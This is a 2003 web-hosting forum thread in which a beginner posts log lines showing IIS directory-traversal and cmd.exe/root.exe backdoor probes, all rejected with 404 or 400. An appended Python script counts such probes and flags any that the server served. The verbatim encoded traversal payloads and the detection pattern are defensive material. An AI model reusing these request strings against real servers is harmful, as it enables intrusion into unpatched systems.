Thread: Was I hacked???

    #1

    Hi there,

    I am new to web hosting, thus I am not good at security.

    However, I might have read somewhere on this forum that the following actions, retrieved from my log file, are a sign of hacking.

    Please analyse:

    61.218.190.227 - - [16/Mar/2003:09:27:47 +1100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
    61.218.190.227 - - [16/Mar/2003:09:27:48 +1100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
    61.218.190.227 - - [16/Mar/2003:09:27:48 +1100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
    61.218.190.227 - - [16/Mar/2003:09:27:49 +1100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
    61.218.190.227 - - [16/Mar/2003:09:27:50 +1100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
    61.218.190.227 - - [16/Mar/2003:09:27:50 +1100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
    61.218.190.227 - - [16/Mar/2003:09:27:51 +1100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
    61.218.190.227 - - [16/Mar/2003:09:27:51 +1100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
    61.218.190.227 - - [16/Mar/2003:09:27:52 +1100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
    61.218.190.227 - - [16/Mar/2003:09:27:53 +1100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
    61.218.190.227 - - [16/Mar/2003:09:27:53 +1100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
    61.218.190.227 - - [16/Mar/2003:09:27:54 +1100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
    61.218.190.227 - - [16/Mar/2003:09:27:55 +1100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
    61.218.190.227 - - [16/Mar/2003:09:27:55 +1100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
    61.218.190.227 - - [16/Mar/2003:09:27:56 +1100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
    61.218.190.227 - - [16/Mar/2003:09:27:56 +1100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298

    If it is, any idea how I could prevent it from happening again, and how do I know what has been stolen or viewed?

    Cheers,

    #2

    Please take a look at this post http://forums.devshed.com/t53884/s.html

    A lot of us have answered the same there
    (it's only a few posts down from yours on this forum)

    All the best
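
One way to triage log lines like those in the first post, added here as an example and not part of the original thread: it counts the probe requests per client and lists any that the server answered with a 2xx/3xx status rather than 4xx. The regexes, the `triage` function name and the last two sample lines are assumptions made for the illustration.

```python
import re
from collections import defaultdict

# Apache Common Log Format: host ident user [time] "request" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) (\S+)$')

# Indicators visible in the posted requests: Windows command interpreters and
# encoded "../" or "..\" sequences (double-encoded %25xx, %%xx, %c0/%c1 forms).
PROBE = re.compile(r'(cmd\.exe|root\.exe|\.\.%25|\.\.%%|\.\.%c[01]%)', re.I)

def triage(lines):
    """Return {client_ip: {"probes": n, "served": [(time, path, status), ...]}}."""
    report = defaultdict(lambda: {"probes": 0, "served": []})
    for line in lines:
        m = CLF.match(line.strip())
        if not m:
            continue  # not a Common Log Format line
        ip, when, _method, path, status, _size = m.groups()
        if not PROBE.search(path):
            continue  # ordinary request
        entry = report[ip]
        entry["probes"] += 1
        # 4xx/5xx: the server rejected the request or found nothing there.
        # 2xx/3xx on one of these paths is what needs a closer look.
        if status[0] in "23":
            entry["served"].append((when, path, int(status)))
    return dict(report)

# First four lines are copied from the post; the last two are constructed.
SAMPLE = [
    '61.218.190.227 - - [16/Mar/2003:09:27:47 +1100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276',
    '61.218.190.227 - - [16/Mar/2003:09:27:50 +1100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298',
    '61.218.190.227 - - [16/Mar/2003:09:27:53 +1100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297',
    '61.218.190.227 - - [16/Mar/2003:09:27:55 +1100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281',
    '192.0.2.10 - - [16/Mar/2003:09:30:00 +1100] "GET /index.html HTTP/1.0" 200 1024',
    '198.51.100.7 - - [16/Mar/2003:09:31:00 +1100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 512',
]

if __name__ == "__main__":
    for ip, info in triage(SAMPLE).items():
        verdict = "INVESTIGATE" if info["served"] else "all rejected"
        print(f"{ip}: {info['probes']} probe(s), {verdict}")
        for when, path, status in info["served"]:
            print(f"    {when} {status} {path}")
```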
